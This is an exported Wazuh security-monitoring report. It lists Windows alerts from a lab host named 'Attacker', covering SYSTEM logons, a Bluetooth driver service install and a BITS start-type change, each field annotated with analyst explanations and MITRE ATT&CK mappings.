rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533904.259939
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:40:40.9799561Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43525
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  14292
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

New Windows Service Created

🧠 What happened? New Windows Service Created

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:31:48.074+0000 | 🧠 MITRE: ['Persistence', 'Privilege Escalation'] – ['Windows Service'] [T1543.003]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1543.003

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:48.074+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  5
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  New Windows Service Created
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61138
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1543.003']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Persistence', 'Privilege Escalation']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Windows Service']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  2
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533908.267277
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  7045
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:16.4230414Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2969
Incremental log record number – handy for timeline order.

data.win.system.processID:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  3052
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "A service was installed in the system. Service Name: Bluetooth Device (Personal Area Network) Service File Name: \SystemRoot\System32\drivers\bthpan.sys Service Type: kernel mode driver Service Start Type: demand start Service Account: "
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.serviceName:  Bluetooth Device (Personal Area Network)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.imagePath:  \\SystemRoot\\System32\\drivers\\bthpan.sys
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.serviceType:  kernel mode driver
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.startType:  demand start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  5
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Service startup type was changed

🧠 What happened? Service startup type was changed

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:48.380+0000 | 🧠 MITRE: Unknown – Unknown [-]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] -

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:48.380+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Service startup type was changed
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  61104
Numeric ID of the detection rule that fired.

rule.info:  This does not appear to be logged on Windows 2000
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.firedtimes:  9
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_system', 'policy_changed']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.pci_dss:  ['10.6']
PCI DSS mapping – card‑holder data rules.

rule.gdpr:  ['IV_35.7.d']
General Data Protection Regulation relevance.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AU.6']
NIST 800‑53 mapping – US Fed controls.

rule.tsc:  ['CC6.1', 'CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533908.269386
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {555908d1-a6d7-4695-8e1e-26931d2012f4}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventSourceName:  Service Control Manager
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  7040
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  0
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8080000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:31:20.5278944Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  2970
Incremental log record number – handy for timeline order.

data.win.system.processID:  772
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  3052
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "The start type of the Background Intelligent Transfer Service service was changed from demand start to auto start."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param1:  Background Intelligent Transfer Service
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param2:  demand start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param3:  auto start
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.param4:  BITS
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:54.529+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:54.529+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  23
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533914.271196
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:41:18.2062622Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43568
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  9432
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  Medium
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Behaviour‑based score ≥ 6
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:31:54.796+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:31:54.796+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  24
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745533914.278532
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8020000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-20T01:42:38.4198684Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  43571
Incremental log record number – handy for timeline order.

data.win.system.processID:  792
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  14292
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Security
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  AUDIT_SUCCESS
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "An account was successfully logged on. Subject: Security ID: S-1-5-18 Account Name: ATTACKER$ Account Domain: WORKGROUP Logon ID: 0x3E7 Logon Information: Logon Type: 5 Restricted Admin Mode: - Remote Credential Guard: - Virtual Account: No Elevated Token: Yes Impersonation Level: Impersonation New Logon: Security ID: S-1-5-18 Account Name: SYSTEM Account Domain: NT AUTHORITY Logon ID: 0x3E7 Linked Logon ID: 0x0 Network Account Name: - Network Account Domain: - Logon GUID: {00000000-0000-0000-0000-000000000000} Process Information: Process ID: 0x304 Process Name: C:\Windows\System32\services.exe Network Information: Workstation Name: - Source Network Address: - Source Port: - Detailed Authentication Information: Logon Process: Advapi Authentication Package: Negotiate Transited Services: - Package Name (NTLM only): - Key Length: 0 This event is generated when a logon session is created. It is generated on the computer that was accessed. The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. The impersonation level field indicates the extent to which a process in the logon session can impersonate. The authentication information fields provide detailed information about this specific logon request. - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. - Transited services indicate which intermediate services have participated in this logon request. - Package name indicates which sub-protocol was used among the NTLM protocols. - Key length indicates the length of the generated session key. This will be 0 if no session key was requested."
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectUserName:  ATTACKER$
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectDomainName:  WORKGROUP
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.subjectLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserSid:  S-1-5-18
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetUserName:  SYSTEM
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetDomainName:  NT AUTHORITY
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLogonId:  0x3e7
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonType:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonProcessName:  Advapi
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.authenticationPackageName:  Negotiate
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {00000000-0000-0000-0000-000000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.keyLength:  0
Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.

data.win.eventdata.processId:  0x304
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processName:  C:\\Windows\\System32\\services.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.impersonationLevel:  %%1833
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.virtualAccount:  %%1843
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetLinkedLogonId:  0x0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.elevatedToken:  %%1842
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  7
